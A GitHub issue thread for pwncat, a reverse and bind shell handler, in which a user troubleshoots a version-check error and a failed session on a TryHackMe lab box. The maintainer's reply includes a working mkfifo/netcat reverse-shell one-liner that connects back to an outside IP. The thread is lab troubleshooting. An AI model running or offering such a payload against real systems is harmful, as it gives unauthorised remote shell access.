search

calebstewart / pwncat

Fancy reverse and bind shell handler
https://pwncat.readthedocs.io
MIT License
2.63k stars 258 forks source link

importlib.metadata.PackageNotFoundError: pwncat #222

Closed diegoxcn closed 2 years ago

diegoxcn commented 2 years ago

Hi, I'm new to this tool. But after installation it seems like failed to capture active session, and give this error message when I try to check the version of I installed.

Bug Description

╰─λ pwncat-cs --version                                                                     0 (0.752s)
Traceback (most recent call last):
  File "/home/user/.local/bin/pwncat-cs", line 8, in <module>
    sys.exit(main())
  File "/home/user/.local/lib/python3.9/site-packages/pwncat/__main__.py", line 104, in main
    print(importlib.metadata.version("pwncat"))
  File "/usr/lib/python3.9/importlib/metadata.py", line 551, in version
    return distribution(distribution_name).version
  File "/usr/lib/python3.9/importlib/metadata.py", line 524, in distribution
    return Distribution.from_name(distribution_name)
  File "/usr/lib/python3.9/importlib/metadata.py", line 187, in from_name
    raise PackageNotFoundError(name)
importlib.metadata.PackageNotFoundError: pwncat

pwncat version

I installed pwncat-cs by pip

╰─λ pip3 install pwncat-cs                                                                  0 (2.131s)
Defaulting to user installation because normal site-packages is not writeable
Collecting pwncat-cs
  Using cached pwncat_cs-0.5.0-py3-none-any.whl (2.4 MB)
Requirement already satisfied: Jinja2<4.0.0,>=3.0.1 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.0.3)
Requirement already satisfied: pycryptodome<4.0.0,>=3.10.1 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.11.0)
Requirement already satisfied: prompt-toolkit<4.0.0,>=3.0.19 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.0.23)
Requirement already satisfied: zodburi<3.0.0,>=2.5.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (2.5.0)
Requirement already satisfied: packaging<21.0,>=20.9 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (20.9)
Requirement already satisfied: rich<11.0.0,>=10.4.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (10.15.1)
Requirement already satisfied: ZODB3<4.0.0,>=3.11.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.11.0)
Requirement already satisfied: requests<3.0.0,>=2.25.1 in /usr/lib/python3/dist-packages (from pwncat-cs) (2.25.1)
Requirement already satisfied: paramiko<3.0.0,>=2.7.2 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (2.8.0)
Requirement already satisfied: netifaces<0.12.0,>=0.11.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (0.11.0)
Requirement already satisfied: python-rapidjson<2.0,>=1.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (1.5)
Requirement already satisfied: MarkupSafe>=2.0 in /home/user/.local/lib/python3.9/site-packages (from Jinja2<4.0.0,>=3.0.1->pwncat-cs) (2.0.1)
Requirement already satisfied: pyparsing>=2.0.2 in /usr/lib/python3/dist-packages (from packaging<21.0,>=20.9->pwncat-cs) (2.4.7)
Requirement already satisfied: cryptography>=2.5 in /usr/lib/python3/dist-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (3.3.2)
Requirement already satisfied: pynacl>=1.0.1 in /usr/lib/python3/dist-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.4.0)
Requirement already satisfied: bcrypt>=3.1.3 in /home/user/.local/lib/python3.9/site-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (3.2.0)
Requirement already satisfied: wcwidth in /home/user/.local/lib/python3.9/site-packages (from prompt-toolkit<4.0.0,>=3.0.19->pwncat-cs) (0.2.5)
Requirement already satisfied: pygments<3.0.0,>=2.6.0 in /home/user/.local/lib/python3.9/site-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (2.10.0)
Requirement already satisfied: colorama<0.5.0,>=0.4.0 in /usr/lib/python3/dist-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (0.4.4)
Requirement already satisfied: commonmark<0.10.0,>=0.9.0 in /home/user/.local/lib/python3.9/site-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (0.9.1)
Requirement already satisfied: transaction in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (3.0.1)
Requirement already satisfied: ZEO>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.2.3)
Requirement already satisfied: ZODB>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.6.0)
Requirement already satisfied: BTrees>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.9.2)
Requirement already satisfied: persistent>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.7.0)
Requirement already satisfied: ZConfig in /home/user/.local/lib/python3.9/site-packages (from zodburi<3.0.0,>=2.5.0->pwncat-cs) (3.6.0)
Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.16.0)
Requirement already satisfied: cffi>=1.1 in /home/user/.local/lib/python3.9/site-packages (from bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.14.6)
Requirement already satisfied: zope.interface>=5.0.0 in /home/user/.local/lib/python3.9/site-packages (from BTrees>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.4.0)
Requirement already satisfied: zdaemon in /home/user/.local/lib/python3.9/site-packages (from ZEO>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.3)
Requirement already satisfied: zc.lockfile in /home/user/.local/lib/python3.9/site-packages (from ZEO>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (2.0)
Requirement already satisfied: zodbpickle>=1.0.1 in /home/user/.local/lib/python3.9/site-packages (from ZODB>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (2.2.0)
Requirement already satisfied: pycparser in /home/user/.local/lib/python3.9/site-packages (from cffi>=1.1->bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (2.20)
Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from zodbpickle>=1.0.1->ZODB>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (52.0.0)
Installing collected packages: pwncat-cs
Successfully installed pwncat-cs-0.5.0

Target System (aka "victim")

Tryhackme madness Haven't tried on others yet.

Steps to Reproduce

Steps to reproduce the behavior: On victim box: 1.nc 9001 | /bin/sh On attack box: 1.

─λ pwncat-cs -Vlp 9001                                                                     1 (0.300s)
[13:02:00] Welcome to pwncat 🐈!                                                       __main__.py:164
[13:02:13] received connection from 10.10.149.96:40006                                      bind.py:84
[12/01/21 13:02:13] INFO      stty -echo nl lnext ^V ; export PS1=                       linux.py:1654
                    INFO      export PS1=;echo; echo w76oytTNDH; echo $$ 0</dev/null;    linux.py:1192
                             R=$?; echo EgpkDsimvF; echo $R; echo KE5fMGZsoT                          
[13:02:43] connection failed: channel receive timed out: b''                            manager.py:957

Expected Behavior

version can show correct infomation; session can be captured.

Screenshots

If applicable, add screenshots to help explain your problem.

calebstewart commented 2 years ago

The error you get when running --version is a known bug but shouldn't affect the functionality. It just affects using --version. I will push a fix for that in the next day or so.

Regarding the failed session, you aren't connecting standard output of the shell to the socket. You are connecting pwncat to the standard input of /bin/bash, but standard output is going to the terminal where you ran the nc command. pwncat needs to be able to see the output of the shell.

Long-story-short, you need to change your payload. https://www.revshells.com/ is a great resource for reverse and bind shell payloads. If you don't have the -e option for netcat, then you can select nc mkfifo from the list on the left, and bash for the shell, and then you should get a payload something like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.122.1 4444 >/tmp/f

Obviously, change the IP address and port number to your liking.

calebstewart commented 2 years ago

This has been fixed, and is now pushed to PyPI.